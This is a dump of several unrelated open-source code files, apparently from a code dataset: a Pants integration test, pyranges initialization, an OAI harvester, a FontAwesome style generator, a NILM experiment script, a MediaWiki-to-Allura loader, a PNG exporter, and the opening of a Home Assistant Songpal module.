with environment_as(PANTS_BUILDROOT_OVERRIDE=worktree):
yield worktree
class ChangedIntegrationTest(PantsRunIntegrationTest, TestGenerator):
TEST_MAPPING = {
# A `jvm_binary` with `source='file.name'`.
'src/java/org/pantsbuild/helloworld/helloworld.java': dict(
none=['src/java/org/pantsbuild/helloworld:helloworld'],
direct=['src/java/org/pantsbuild/helloworld:helloworld'],
transitive=['src/java/org/pantsbuild/helloworld:helloworld']
),
# A `python_binary` with `source='file.name'`.
'src/python/python_targets/test_binary.py': dict(
none=['src/python/python_targets:test'],
direct=['src/python/python_targets:test'],
transitive=['src/python/python_targets:test']
),
# A `python_library` with `sources=['file.name']`.
'src/python/python_targets/test_library.py': dict(
none=['src/python/python_targets:test_library'],
direct=['src/python/python_targets:test',
'src/python/python_targets:test_library',
'src/python/python_targets:test_library_direct_dependee'],
transitive=['src/python/python_targets:test',
'src/python/python_targets:test_library',
'src/python/python_targets:test_library_direct_dependee',
'src/python/python_targets:test_library_transitive_dependee',
'src/python/python_targets:test_library_transitive_dependee_2',
'src/python/python_targets:test_library_transitive_dependee_3',
'src/python/python_targets:test_library_transitive_dependee_4']
),
# A `resources` target with `sources=['file.name']` referenced by a `java_library` target.
'src/resources/org/pantsbuild/resourceonly/README.md': dict(
none=['src/resources/org/pantsbuild/resourceonly:resource'],
direct=['src/java/org/pantsbuild/helloworld:helloworld',
'src/resources/org/pantsbuild/resourceonly:resource'],
transitive=['src/java/org/pantsbuild/helloworld:helloworld',
'src/resources/org/pantsbuild/resourceonly:resource'],
),
# A `python_library` with `resources=['file.name']`.
'src/python/sources/sources.txt': dict(
none=['src/python/sources:sources'],
direct=['src/python/sources:sources'],
transitive=['src/python/sources:sources']
),
# A `scala_library` with `sources=['file.name']`.
'tests/scala/org/pantsbuild/cp-directories/ClasspathDirectoriesSpec.scala': dict(
none=['tests/scala/org/pantsbuild/cp-directories:cp-directories'],
direct=['tests/scala/org/pantsbuild/cp-directories:cp-directories'],
transitive=['tests/scala/org/pantsbuild/cp-directories:cp-directories']
),
# An unclaimed source file.
'src/python/python_targets/test_unclaimed_src.py': dict(
none=[],
direct=[],
transitive=[]
)
}
@classmethod
def generate_tests(cls):
"""Generates tests on the class for better reporting granularity than an opaque for loop test."""
def safe_filename(f):
return f.replace('/', '_').replace('.', '_')
for filename, dependee_mapping in cls.TEST_MAPPING.items():
for dependee_type in dependee_mapping.keys():
# N.B. The parameters here are used purely to close over the respective loop variables.
def inner_integration_coverage_test(self, filename=filename, dependee_type=dependee_type):
with create_isolated_git_repo() as worktree:
# Mutate the working copy so we can do `--changed-parent=HEAD` deterministically.
with mutated_working_copy([os.path.join(worktree, filename)]):
stdout = self.assert_changed_new_equals_old(
['--changed-include-dependees={}'.format(dependee_type), '--changed-parent=HEAD'],
test_list=True
)
self.assertEqual(
lines_to_set(self.TEST_MAPPING[filename][dependee_type]),
lines_to_set(stdout)
)
cls.add_test(
'test_changed_coverage_{}_{}'.format(dependee_type, safe_filename(filename)),
inner_integration_coverage_test
)
def assert_changed_new_equals_old(self, extra_args, success=True, test_list=False):
args = ['-q', 'changed'] + extra_args
changed_run = self.do_command(*args, success=success, enable_v2_engine=False)
engine_changed_run = self.do_command(*args, success=success, enable_v2_engine=True)
self.assertEqual(
lines_to_set(changed_run.stdout_data), lines_to_set(engine_changed_run.stdout_data)
)
if test_list:
# In the v2 engine, `--changed-*` options can alter the specs of any goal - test with `list`.
list_args = ['-q', 'list'] + extra_args
engine_list_run = self.do_command(*list_args, success=success, enable_v2_engine=True)
self.assertEqual(
lines_to_set(changed_run.stdout_data), lines_to_set(engine_list_run.stdout_data)
)
# If we get to here without asserting, we know all copies of stdout are identical - return one.
return changed_run.stdout_data
@ensure_engine
def test_changed_options_scope_shadowing(self):
"""Tests that the `test-changed` scope overrides `changed` scope."""
changed_src = 'src/python/python_targets/test_library.py'
expected_target = self.TEST_MAPPING[changed_src]['none'][0]
expected_set = {expected_target}
not_expected_set = set(self.TEST_MAPPING[changed_src]['transitive']).difference(expected_set)
with create_isolated_git_repo() as worktree:
with mutated_working_copy([os.path.join(worktree, changed_src)]):
pants_run = self.run_pants([
'-ldebug', # This ensures the changed target name shows up in the pants output.
'test-changed',
'--test-changed-changes-since=HEAD',
'--test-changed-include-dependees=none', # This option should be used.
'--changed-include-dependees=transitive' # This option should be stomped on.
])
self.assert_success(pants_run)
for expected_item in expected_set:
self.assertIn(expected_item, pants_run.stdout_data)
for not_expected_item in not_expected_set:
if expected_target.startswith(not_expected_item):
continue # Ignore subset matches.
self.assertNotIn(not_expected_item, pants_run.stdout_data)
@ensure_engine
def test_changed_options_scope_positional(self):
changed_src = 'src/python/python_targets/test_library.py'
expected_set = set(self.TEST_MAPPING[changed_src]['transitive'])
with create_isolated_git_repo() as worktree:
with mutated_working_copy([os.path.join(worktree, changed_src)]):
pants_run = self.run_pants([
'-ldebug', # This ensures the changed target names show up in the pants output.
'test-changed',
'--changes-since=HEAD',
'--include-dependees=transitive'
])
self.assert_success(pants_run)
for expected_item in expected_set:
self.assertIn(expected_item, pants_run.stdout_data)
@ensure_engine
def test_test_changed_exclude_target(self):
changed_src = 'src/python/python_targets/test_library.py'
exclude_target_regexp = r'_[0-9]'
excluded_set = {'src/python/python_targets:test_library_transitive_dependee_2',
'src/python/python_targets:test_library_transitive_dependee_3',
'src/python/python_targets:test_library_transitive_dependee_4'}
expected_set = set(self.TEST_MAPPING[changed_src]['transitive']) - excluded_set
with create_isolated_git_repo() as worktree:
with mutated_working_copy([os.path.join(worktree, changed_src)]):
pants_run = self.run_pants([
'-ldebug', # This ensures the changed target names show up in the pants output.
'--exclude-target-regexp={}'.format(exclude_target_regexp),
'test-changed',
'--changes-since=HEAD',
'--include-dependees=transitive'
])
self.assert_success(pants_run)
for expected_item in expected_set:
self.assertIn(expected_item, pants_run.stdout_data)
for excluded_item in excluded_set:
self.assertNotIn(excluded_item, pants_run.stdout_data)
@ensure_engine
def test_changed_changed_since_and_files(self):
with create_isolated_git_repo():
stdout = self.assert_changed_new_equals_old(['--changed-since=HEAD^^', '--files'])
# The output should be the files added in the last 2 commits.
self.assertEqual(
lines_to_set(stdout),
{'src/python/sources/BUILD',
'src/python/sources/sources.py',
'src/python/sources/sources.txt',
'3rdparty/BUILD'}
)
@ensure_engine
def test_changed_diffspec_and_files(self):
with create_isolated_git_repo():
git_sha = subprocess.check_output(['git', 'rev-parse', 'HEAD^^']).strip()
stdout = self.assert_changed_new_equals_old(['--changed-diffspec={}'.format(git_sha), '--files'])
# The output should be the files added in the last 2 commits.
self.assertEqual(
lines_to_set(stdout),
{'src/python/python_targets/BUILD',
'src/python/python_targets/test_binary.py',
'src/python/python_targets/test_library.py',
'src/python/python_targets/test_unclaimed_src.py'}
)
# Following 4 tests do not run in isolated repo because they don't mutate working copy.
def test_changed(self):
self.assert_changed_new_equals_old([])
def test_changed_with_changes_since(self):
self.assert_changed_new_equals_old(['--changes-since=HEAD^^'])
def test_changed_with_changes_since_direct(self):
self.assert_changed_new_equals_old(['--changes-since=HEAD^^', '--include-dependees=direct'])
def test_changed_with_changes_since_transitive(self):
self.assert_changed_new_equals_old(['--changes-since=HEAD^^', '--include-dependees=transitive'])
ChangedIntegrationTest.generate_tests()
| apache-2.0 | -7,091,702,238,887,517,000 | 39.181347 | 106 | 0.648227 | false | 3.567157 | true | false | false |
biocore-ntnu/pyranges | pyranges/methods/init.py | 1 | 5712 | import sys
import numpy as np
import pandas as pd
from natsort import natsorted
from pyranges.statistics import StatisticsMethods
from pyranges.genomicfeatures import GenomicFeaturesMethods
from pyranges import PyRanges
from pyranges.helpers import single_value_key, get_key_from_df
def set_dtypes(df, int64):
# if extended is None:
# extended = False if df.Start.dtype == np.int32 else True
if not int64:
dtypes = {
"Start": np.int32,
"End": np.int32,
"Chromosome": "category",
"Strand": "category",
}
else:
dtypes = {
"Start": np.int64,
"End": np.int64,
"Chromosome": "category",
"Strand": "category",
}
if "Strand" not in df:
del dtypes["Strand"]
# need to ascertain that object columns do not consist of multiple types
# https://github.com/biocore-ntnu/epic2/issues/32
for column in "Chromosome Strand".split():
if column not in df:
continue
df[column] = df[column].astype(str)
for col, dtype in dtypes.items():
if df[col].dtype.name != dtype:
df[col] = df[col].astype(dtype)
return df
def create_df_dict(df, stranded):
chrs = df.Chromosome.cat.remove_unused_categories()
df["Chromosome"] = chrs
if stranded:
grpby_key = "Chromosome Strand".split()
df["Strand"] = df.Strand.cat.remove_unused_categories()
else:
grpby_key = "Chromosome"
return {k: v for k, v in df.groupby(grpby_key)}
def create_pyranges_df(chromosomes, starts, ends, strands=None):
if isinstance(chromosomes, str) or isinstance(chromosomes, int):
chromosomes = pd.Series([chromosomes] * len(starts), dtype="category")
if strands is not None:
if isinstance(strands, str):
strands = pd.Series([strands] * len(starts), dtype="category")
columns = [chromosomes, starts, ends, strands]
lengths = list(str(len(s)) for s in columns)
assert (
len(set(lengths)) == 1
), "chromosomes, starts, ends and strands must be of equal length. But are {}".format(
", ".join(lengths)
)
colnames = "Chromosome Start End Strand".split()
else:
columns = [chromosomes, starts, ends]
lengths = list(str(len(s)) for s in columns)
assert (
len(set(lengths)) == 1
), "chromosomes, starts and ends must be of equal length. But are {}".format(
", ".join(lengths)
)
colnames = "Chromosome Start End".split()
idx = range(len(starts))
series_to_concat = []
for s in columns:
if isinstance(s, pd.Series):
s = pd.Series(s.values, index=idx)
else:
s = pd.Series(s, index=idx)
series_to_concat.append(s)
df = pd.concat(series_to_concat, axis=1)
df.columns = colnames
return df
def check_strandedness(df):
"""Check whether strand contains '.'"""
if "Strand" not in df:
return False
contains_more_than_plus_minus_in_strand_col = False
if str(df.Strand.dtype) == "category" and (
set(df.Strand.cat.categories) - set("+-")
):
contains_more_than_plus_minus_in_strand_col = True
elif not ((df.Strand == "+") | (df.Strand == "-")).all():
contains_more_than_plus_minus_in_strand_col = True
# if contains_more_than_plus_minus_in_strand_col:
# logging.warning("Strand contained more symbols than '+' or '-'. Not supported (yet) in PyRanges.")
return not contains_more_than_plus_minus_in_strand_col
def _init(
self,
df=None,
chromosomes=None,
starts=None,
ends=None,
strands=None,
int64=False,
copy_df=True,
):
# TODO: add categorize argument with dict of args to categorize?
if isinstance(df, PyRanges):
raise Exception("Object is already a PyRange.")
if isinstance(df, pd.DataFrame):
assert all(
c in df for c in "Chromosome Start End".split()
), "The dataframe does not have all the columns Chromosome, Start and End."
if copy_df:
df = df.copy()
if df is False or df is None:
df = create_pyranges_df(chromosomes, starts, ends, strands)
if isinstance(df, pd.DataFrame):
df = df.reset_index(drop=True)
stranded = check_strandedness(df)
df = set_dtypes(df, int64)
self.__dict__["dfs"] = create_df_dict(df, stranded)
# df is actually dict of dfs
else:
empty_removed = {k: v.copy() for k, v in df.items() if not v.empty}
_single_value_key = True
_key_same = True
_strand_valid = True
_has_strand = True
for key, df in empty_removed.items():
_key = get_key_from_df(df)
_single_value_key = single_value_key(df) and _single_value_key
_key_same = (_key == key) and _key_same
if isinstance(_key, tuple):
_strand_valid = _strand_valid and (_key[1] in ["+", "-"])
else:
_has_strand = False
if not all([_single_value_key, _key_same, _strand_valid]):
df = pd.concat(empty_removed.values()).reset_index(drop=True)
if _has_strand and _strand_valid:
empty_removed = df.groupby(["Chromosome", "Strand"])
else:
empty_removed = df.groupby("Chromosome")
empty_removed = {k: v for (k, v) in empty_removed}
self.__dict__["dfs"] = empty_removed
self.__dict__["features"] = GenomicFeaturesMethods(self)
self.__dict__["stats"] = StatisticsMethods(self)
| mit | -507,038,553,936,319,200 | 28.142857 | 112 | 0.582983 | false | 3.550031 | false | false | false |
erinspace/scrapi | scrapi/harvesters/iwu_commons.py | 2 | 3226 | '''
Harvester for the Digital Commons @ IWU for the SHARE project
Example API call: http://digitalcommons.iwu.edu/do/oai/?verb=ListRecords&metadataPrefix=oai_dc
'''
from __future__ import unicode_literals
from scrapi.base import OAIHarvester
class Iwu_commonsHarvester(OAIHarvester):
short_name = 'iwu_commons'
long_name = 'Digital Commons @ Illinois Wesleyan University'
url = 'http://digitalcommons.iwu.edu'
base_url = 'http://digitalcommons.iwu.edu/do/oai/'
property_list = ['date', 'type', 'source', 'format', 'identifier', 'setSpec']
approved_sets = [
u'oral_hist',
u'ames_award',
u'arthonors_book_gallery',
u'arthonors',
u'bio',
u'music_compositions',
u'cs',
u'constructing',
u'economics',
u'education',
u'ed_studies_posters',
u'eng',
u'envstu',
u'fac_biennial_exhibit_all',
u'fac_biennial_exhibit2011',
u'fac_biennial_exhibit2013',
u'fac_biennial_exhibit',
u'firstyear_summer',
u'founders_day_docs',
u'german',
u'theatre_hist',
u'history',
u'teaching_excellence',
u'honors_docs',
u'honors_programs_docs',
u'physics_honproj',
u'bio_honproj',
u'intstu_honproj',
u'envstu_honproj',
u'russian_honproj',
u'history_honproj',
u'theatre_honproj',
u'religion_honproj',
u'wostu_honproj',
u'nursing_honproj',
u'education_honproj',
u'eng_honproj',
u'french_honproj',
u'math_honproj',
u'socanth_honproj',
u'econ_honproj',
u'art_honproj',
u'cs_honproj',
u'amstudies_honproj',
u'grs_honproj',
u'hispstu_honproj',
u'polisci_honproj',
u'chem_honproj',
u'phil_honproj',
u'acct_fin_honproj',
u'busadmin_honproj',
u'german_honproj',
u'psych_honproj',
u'bookshelf',
u'wglt_interviews',
u'oralhist_2009',
u'oralhist_ucd',
u'oralhist_wesn',
u'italian',
u'japanese',
u'jwprc',
u'math',
u'music',
u'nursing',
u'oralhistory',
u'oralhistory_gallery',
u'anth_ethno',
u'gateway',
u'envstu_seminar',
u'music_outstanding_works',
u'writing_student',
u'polsci',
u'psych',
u'religion',
u'respublica',
u'russian',
u'grs_scholarship',
u'math_scholarship',
u'nursing_scholarship',
u'bio_scholarship',
u'religion_scholarship',
u'mcll_scholarship',
u'envstu_scholarship',
u'physics_scholarship',
u'socanth_scholarship',
u'history_scholarship',
u'intstu_scholarship',
u'cs_scholarship',
u'chem_scholarship',
u'eng_scholarship',
u'hispstu_scholarship',
u'psych_scholarship',
u'socanth',
u'student_prof',
u'sea',
u'parkplace',
u'uer',
u'germanresearch',
u'uauje',
u'univcom',
u'wglt'
]
timezone_granularity = True
| apache-2.0 | 4,698,636,792,873,201,000 | 25.227642 | 94 | 0.542157 | false | 2.908927 | false | false | false |
Gaaralmn/resume | scripts/fs_sty.py | 10 | 1702 | #!/usr/bin/env python
import os
import re
from sys import argv
scripts, css = argv
# filter icon name, ignore alias
def fil_icname(line):
if re.search('^\.fa-.*:before {$', line):
ic_name = re.split("[.:]", line)[1][3:]
return ic_name
def fil_iccode(line):
if re.search('^ content: .*;$', line):
ic_code = re.split("[\"]", line)[1][1:].upper()
return ic_code
# turn icon name to Camel Case
# forked from https://github.com/schischi-a/fontawesome-latex
def camel_case(name):
ret = name.replace('-', ' ')
ret = ret.title()
ret = ret.replace(' ', '')
return ret
def get_icons(fs_css):
icons = []
with open(fs_css, 'r') as fs_fp:
for line in fs_fp:
icon_name = fil_icname(line)
if icon_name is not None:
line = next(fs_fp)
icon_code = fil_iccode(line)
if icon_code is not None:
tex_name = camel_case(icon_name)
icons.append((icon_name, icon_code, tex_name))
return icons
def output_sty(sty, icons):
with open(sty, 'a') as f:
for ic in icons:
prefix = "\expandafter\def\csname faicon@"
ic_name_h = prefix + ic[0] + "\endcsname"
ic_code_tex = "{\symbol{\"" + ic[1] + "}} \\def\\fa" + ic[2]
ic_name_tail = " {{\FA\csname faicon@" + ic[0] + "\endcsname}}\n"
f.write(ic_name_h.ljust(63) + ic_code_tex.ljust(42) + ic_name_tail)
if __name__ == "__main__":
print("output fontawesome.sty...")
icons = get_icons(css)
temp_dir = os.path.dirname(css)
sty = os.path.join(temp_dir, "fontawesome.sty")
output_sty(sty, icons)
| mit | 5,049,159,092,591,307,000 | 26.901639 | 79 | 0.538778 | false | 2.934483 | false | false | false |
mmottahedi/neuralnilm_prototype | scripts/e544.py | 2 | 6184 | from __future__ import print_function, division
import matplotlib
import logging
from sys import stdout
matplotlib.use('Agg') # Must be before importing matplotlib.pyplot or pylab!
from neuralnilm import (Net, RealApplianceSource)
from neuralnilm.source import (standardise, discretize, fdiff, power_and_fdiff,
RandomSegments, RandomSegmentsInMemory,
SameLocation)
from neuralnilm.experiment import run_experiment, init_experiment
from neuralnilm.net import TrainingError
from neuralnilm.layers import (MixtureDensityLayer, DeConv1DLayer,
SharedWeightsDenseLayer)
from neuralnilm.objectives import (scaled_cost, mdn_nll,
scaled_cost_ignore_inactive, ignore_inactive,
scaled_cost3)
from neuralnilm.plot import MDNPlotter, CentralOutputPlotter, Plotter, RectangularOutputPlotter, StartEndMeanPlotter
from neuralnilm.updates import clipped_nesterov_momentum
from neuralnilm.disaggregate import disaggregate
from neuralnilm.rectangulariser import rectangularise
from lasagne.nonlinearities import sigmoid, rectify, tanh, identity, softmax
from lasagne.objectives import squared_error, binary_crossentropy
from lasagne.init import Uniform, Normal
from lasagne.layers import (DenseLayer, Conv1DLayer,
ReshapeLayer, FeaturePoolLayer,
DimshuffleLayer, DropoutLayer, ConcatLayer, PadLayer)
from lasagne.updates import nesterov_momentum, momentum
from functools import partial
import os
import __main__
from copy import deepcopy
from math import sqrt
import numpy as np
import theano.tensor as T
import gc
"""
447: first attempt at disaggregation
"""
NAME = os.path.splitext(os.path.split(__main__.__file__)[1])[0]
#PATH = "/homes/dk3810/workspace/python/neuralnilm/figures"
PATH = "/data/dk3810/figures"
SAVE_PLOT_INTERVAL = 25000
N_SEQ_PER_BATCH = 64
MAX_TARGET_POWER = 300
source_dict = dict(
filename='/data/dk3810/ukdale.h5',
appliances=[
['fridge freezer', 'fridge', 'freezer'],
['washer dryer', 'washing machine'],
'kettle',
'HTPC',
'dish washer'
],
max_appliance_powers=[MAX_TARGET_POWER, 2400, 2400, 200, 2500],
on_power_thresholds=[5] * 5,
min_on_durations=[60, 1800, 30, 60, 1800],
min_off_durations=[12, 600, 1, 12, 1800],
# date finished installing meters in house 1 = 2013-04-12
window=("2013-04-12", "2014-12-10"),
seq_length=512,
output_one_appliance=True,
train_buildings=[1],
validation_buildings=[1],
n_seq_per_batch=N_SEQ_PER_BATCH,
standardise_input=True,
independently_center_inputs=False,
skip_probability=0.75,
# skip_probability_for_first_appliance=0.5,
target_is_start_and_end_and_mean=True,
one_target_per_seq=False
)
net_dict = dict(
save_plot_interval=SAVE_PLOT_INTERVAL,
loss_function=lambda x, t: squared_error(x, t).mean(),
updates_func=nesterov_momentum,
learning_rate=1e-3,
learning_rate_changes_by_iteration={
500000: 1e-4,
600000: 1e-5
},
do_save_activations=True,
auto_reshape=False,
plotter=StartEndMeanPlotter(
n_seq_to_plot=32, max_target_power=MAX_TARGET_POWER)
)
def exp_a(name):
global source
source_dict_copy = deepcopy(source_dict)
source_dict_copy.update(dict(
logger=logging.getLogger(name)
))
source = RealApplianceSource(**source_dict_copy)
net_dict_copy = deepcopy(net_dict)
net_dict_copy.update(dict(
experiment_name=name,
source=source
))
NUM_FILTERS = 16
target_seq_length = source.output_shape_after_processing()[1]
net_dict_copy['layers_config'] = [
{
'type': DimshuffleLayer,
'pattern': (0, 2, 1) # (batch, features, time)
},
{
'type': PadLayer,
'width': 4
},
{
'type': Conv1DLayer, # convolve over the time axis
'num_filters': NUM_FILTERS,
'filter_size': 4,
'stride': 1,
'nonlinearity': None,
'border_mode': 'valid'
},
{
'type': Conv1DLayer, # convolve over the time axis
'num_filters': NUM_FILTERS,
'filter_size': 4,
'stride': 1,
'nonlinearity': None,
'border_mode': 'valid'
},
{
'type': DimshuffleLayer,
'pattern': (0, 2, 1), # back to (batch, time, features)
'label': 'dimshuffle3'
},
{
'type': DenseLayer,
'num_units': 512 * 8,
'nonlinearity': rectify,
'label': 'dense0'
},
{
'type': DenseLayer,
'num_units': 512 * 6,
'nonlinearity': rectify,
'label': 'dense1'
},
{
'type': DenseLayer,
'num_units': 512 * 4,
'nonlinearity': rectify,
'label': 'dense2'
},
{
'type': DenseLayer,
'num_units': 512,
'nonlinearity': rectify
},
{
'type': DenseLayer,
'num_units': target_seq_length,
'nonlinearity': None
}
]
net = Net(**net_dict_copy)
return net
def main():
EXPERIMENTS = list('a')
for experiment in EXPERIMENTS:
full_exp_name = NAME + experiment
func_call = init_experiment(PATH, experiment, full_exp_name)
logger = logging.getLogger(full_exp_name)
try:
net = eval(func_call)
run_experiment(net, epochs=None)
except KeyboardInterrupt:
logger.info("KeyboardInterrupt")
break
except Exception as exception:
logger.exception("Exception")
# raise
finally:
logging.shutdown()
if __name__ == "__main__":
main()
"""
Emacs variables
Local Variables:
compile-command: "cp /home/jack/workspace/python/neuralnilm/scripts/e544.py /mnt/sshfs/imperial/workspace/python/neuralnilm/scripts/"
End:
"""
| mit | 7,918,684,810,106,850,000 | 29.613861 | 133 | 0.599612 | false | 3.626979 | false | false | false |
pombredanne/SourceForge-Allura | ForgeWiki/forgewiki/command/wiki2markdown/loaders.py | 2 | 7674 | import os
import json
import datetime
from pylons import c
from ming.orm.ormsession import ThreadLocalORMSession
from allura import model as M
from forgewiki import model as WM
from forgewiki.converters import mediawiki2markdown
from forgewiki.converters import mediawiki_internal_links2markdown
from allura.command import base as allura_base
from allura.lib import helpers as h
from allura.lib import utils
from allura.model.session import artifact_orm_session
class MediawikiLoader(object):
"""Load MediaWiki data from json to Allura wiki tool"""
TIMESTAMP_FMT = '%Y%m%d%H%M%S'
def __init__(self, options):
self.options = options
self.nbhd = M.Neighborhood.query.get(name=options.nbhd)
if not self.nbhd:
allura_base.log.error("Can't find neighborhood with name %s"
% options.nbhd)
exit(2)
self.project = M.Project.query.get(shortname=options.project,
neighborhood_id=self.nbhd._id)
if not self.project:
allura_base.log.error("Can't find project with shortname %s "
"and neighborhood_id %s"
% (options.project, self.nbhd._id))
exit(2)
self.wiki = self.project.app_instance('wiki')
if not self.wiki:
allura_base.log.error("Can't find wiki app in given project")
exit(2)
h.set_context(self.project.shortname, 'wiki', neighborhood=self.nbhd)
self.project.notifications_disabled = True
def exit(self, status):
self.project.notifications_disabled = False
ThreadLocalORMSession.flush_all()
ThreadLocalORMSession.close_all()
exit(status)
def load(self):
artifact_orm_session._get().skip_mod_date = True
self.load_pages()
self.project.notifications_disabled = False
artifact_orm_session._get().skip_mod_date = False
ThreadLocalORMSession.flush_all()
ThreadLocalORMSession.close_all()
allura_base.log.info('Loading wiki done')
def _pages(self):
"""Yield path to page dump directory for next wiki page"""
pages_dir = os.path.join(self.options.dump_dir, 'pages')
pages = []
if not os.path.isdir(pages_dir):
return
pages = os.listdir(pages_dir)
for directory in pages:
dir_path = os.path.join(pages_dir, directory)
if os.path.isdir(dir_path):
yield dir_path
def _history(self, page_dir):
"""Yield page_data for next wiki page in edit history"""
page_dir = os.path.join(page_dir, 'history')
if not os.path.isdir(page_dir):
return
pages = os.listdir(page_dir)
pages.sort() # ensure that history in right order
for page in pages:
fn = os.path.join(page_dir, page)
try:
with open(fn, 'r') as pages_file:
page_data = json.load(pages_file)
except IOError, e:
allura_base.log.error("Can't open file: %s" % str(e))
self.exit(2)
except ValueError, e:
allura_base.log.error("Can't load data from file %s: %s"
% (fn, str(e)))
self.exit(2)
yield page_data
def _talk(self, page_dir):
"""Return talk data from json dump"""
filename = os.path.join(page_dir, 'discussion.json')
if not os.path.isfile(filename):
return
try:
with open(filename, 'r') as talk_file:
talk_data = json.load(talk_file)
except IOError, e:
allura_base.log.error("Can't open file: %s" % str(e))
self.exit(2)
except ValueError, e:
allura_base.log.error("Can't load data from file %s: %s"
% (filename, str(e)))
self.exit(2)
return talk_data
def _attachments(self, page_dir):
"""Yield (filename, full path) to next attachment for given page."""
attachments_dir = os.path.join(page_dir, 'attachments')
if not os.path.isdir(attachments_dir):
return
attachments = os.listdir(attachments_dir)
for filename in attachments:
yield filename, os.path.join(attachments_dir, filename)
def load_pages(self):
"""Load pages with edit history from json to Allura wiki tool"""
allura_base.log.info('Loading pages into allura...')
for page_dir in self._pages():
for page in self._history(page_dir):
p = WM.Page.upsert(page['title'])
p.viewable_by = ['all']
p.text = mediawiki_internal_links2markdown(
mediawiki2markdown(page['text']),
page['title'])
timestamp = datetime.datetime.strptime(page['timestamp'],
self.TIMESTAMP_FMT)
p.mod_date = timestamp
c.user = (M.User.query.get(username=page['username'].lower())
or M.User.anonymous())
ss = p.commit()
ss.mod_date = ss.timestamp = timestamp
# set home to main page
if page['title'] == 'Main_Page':
gl = WM.Globals.query.get(app_config_id=self.wiki.config._id)
if gl is not None:
gl.root = page['title']
allura_base.log.info('Loaded history of page %s (%s)'
% (page['page_id'], page['title']))
self.load_talk(page_dir, page['title'])
self.load_attachments(page_dir, page['title'])
def load_talk(self, page_dir, page_title):
"""Load talk for page.
page_dir - path to directory with page dump.
page_title - page title in Allura Wiki
"""
talk_data = self._talk(page_dir)
if not talk_data:
return
text = mediawiki2markdown(talk_data['text'])
page = WM.Page.query.get(app_config_id=self.wiki.config._id,
title=page_title)
if not page:
return
thread = M.Thread.query.get(ref_id=page.index_id())
if not thread:
return
timestamp = datetime.datetime.strptime(talk_data['timestamp'],
self.TIMESTAMP_FMT)
c.user = (M.User.query.get(username=talk_data['username'].lower())
or M.User.anonymous())
thread.add_post(
text=text,
discussion_id=thread.discussion_id,
thread_id=thread._id,
timestamp=timestamp,
ignore_security=True)
allura_base.log.info('Loaded talk for page %s' % page_title)
def load_attachments(self, page_dir, page_title):
"""Load attachments for page.
page_dir - path to directory with page dump.
"""
page = WM.Page.query.get(app_config_id=self.wiki.config._id,
title=page_title)
for filename, path in self._attachments(page_dir):
try:
with open(path) as fp:
page.attach(filename, fp,
content_type=utils.guess_mime_type(filename))
except IOError, e:
allura_base.log.error("Can't open file: %s" % str(e))
self.exit(2)
allura_base.log.info('Loaded attachments for page %s.' % page_title)
| apache-2.0 | -5,020,394,957,929,959,000 | 39.17801 | 77 | 0.548345 | false | 4.03258 | true | false | false |
gstiebler/odemis | src/odemis/dataio/png.py | 2 | 3415 | # -*- coding: utf-8 -*-
'''
Created on 2 Sep 2014
@author: Éric Piel
Copyright © 2014 Éric Piel, Delmic
This file is part of Odemis.
Odemis is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation.
Odemis is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with Odemis. If not, see http://www.gnu.org/licenses/.
'''
# Very rough converter to simple 8-bit PNG
from __future__ import division
import logging
from odemis import model
from odemis.util import img
import os
import scipy
FORMAT = "PNG"
# list of file-name extensions possible, the first one is the default when saving a file
EXTENSIONS = [u".png"]
# TODO: support 16-bits? But then it looses the point to have a "simple" format?
LOSSY = True # because it doesn't support 16 bits
def _saveAsPNG(filename, data):
# TODO: store metadata
# TODO: support RGB
if data.metadata.get(model.MD_DIMS) == 'YXC':
rgb8 = data
else:
data = img.ensure2DImage(data)
# TODO: it currently fails with large data, use gdal instead?
# tempdriver = gdal.GetDriverByName('MEM')
# tmp = tempdriver.Create('', rgb8.shape[1], rgb8.shape[0], 1, gdal.GDT_Byte)
# tiledriver = gdal.GetDriverByName("png")
# tmp.GetRasterBand(1).WriteArray(rgb8[:, :, 0])
# tiledriver.CreateCopy("testgdal.png", tmp, strict=0)
# TODO: support greyscale png?
# TODO: skip if already 8 bits
# Convert to 8 bit RGB
hist, edges = img.histogram(data)
irange = img.findOptimalRange(hist, edges, 1 / 256)
rgb8 = img.DataArray2RGB(data, irange)
# save to file
scipy.misc.imsave(filename, rgb8)
def export(filename, data, thumbnail=None):
'''
Write a PNG file with the given image
filename (unicode): filename of the file to create (including path). If more
than one data is passed, a number will be appended.
data (list of model.DataArray, or model.DataArray): the data to export.
Metadata is taken directly from the DA object. If it's a list, a multiple
page file is created. It must have 5 dimensions in this order: Channel,
Time, Z, Y, X. However, all the first dimensions of size 1 can be omitted
(ex: an array of 111YX can be given just as YX, but RGB images are 311YX,
so must always be 5 dimensions).
thumbnail (None or numpy.array): Image used as thumbnail for the file. Can be of any
(reasonable) size. Must be either 2D array (greyscale) or 3D with last
dimension of length 3 (RGB). As png doesn't support it, it will
be dropped silently.
'''
if thumbnail is not None:
logging.info("Dropping thumbnail, not supported in PNG")
if isinstance(data, list):
if len(data) > 1:
# Name the files aaa-XXX.png
base, ext = os.path.splitext(filename)
for i, d in enumerate(data):
fn = "%s-%03d%s" % (base, i, ext)
_saveAsPNG(fn, d)
else:
_saveAsPNG(filename, data[0])
else:
_saveAsPNG(filename, data)
| gpl-2.0 | 6,314,940,524,442,912,000 | 36.911111 | 226 | 0.666471 | false | 3.708696 | false | false | false |
Danielhiversen/home-assistant | homeassistant/components/media_player/songpal.py | 3 | 7690 | """
Support for Songpal-enabled (Sony) media devices.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/media_player.songpal/
"""
import logging
import voluptuous as vol
from homeassistant.components.media_player import (
DOMAIN, PLATFORM_SCHEMA, SUPPORT_SELECT_SOURCE, SUPPORT_TURN_OFF,
SUPPORT_TURN_ON, SUPPORT_VOLUME_MUTE, SUPPORT_VOLUME_SET,
SUPPORT_VOLUME_STEP, MediaPlayerDevice)
from homeassistant.const import ATTR_ENTITY_ID, CONF_NAME, STATE_OFF, STATE_ON
from homeassistant.exceptions import PlatformNotReady
import homeassistant.helpers.config_validation as cv
REQUIREMENTS = ['python-songpal==0.0.8']
_LOGGER = logging.getLogger(__name__)
CONF_ENDPOINT = 'endpoint'
PARAM_NAME = 'name'
PARAM_VALUE = 'value'
PLATFORM = 'songpal'
SET_SOUND_SETTING = 'songpal_set_sound_setting'
